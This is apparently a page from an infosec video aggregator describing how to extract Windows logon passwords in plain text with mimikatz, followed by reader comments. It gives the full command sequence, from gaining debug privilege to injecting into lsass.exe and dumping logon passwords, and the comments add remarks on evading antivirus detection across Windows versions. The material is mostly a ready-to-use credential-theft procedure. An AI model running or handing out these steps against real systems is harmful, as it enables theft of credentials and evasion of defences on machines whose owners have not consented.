Description: In this video I'll show you how to grab windows passwords in plain text.
Download "mimikatz_trunk.zip" from "blog.gentilkiwi.com/mimikatz"; and extract it to "C:\Windows\System32" .
Run cmd as Administrator.
Commands:
C:\Windows\System32\mimikatz_trunk\win32 .
mimikatz.exe
privilege::debug
inject::process lsass.exe sekurlsa.dll
@getLogonPasswords
Tags: hacking , windows , plain text , windows password in plain text , Grabbing windows passwords in plain text ,
Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying.
will AV detect dll injection to lsass.exe ?
Some yes ;) but the author doesn't read my latests posts ;) you can avoid injection with new mimikatz, it only reads memory without injection ;)
See sample here : http://blog.gentilkiwi.com/mimikatz
I tested it with some of AVs... It didn't detect the injection... And the best part is that it works for Windows XP, VISTA, 7 and amazingly for Windows 8 also...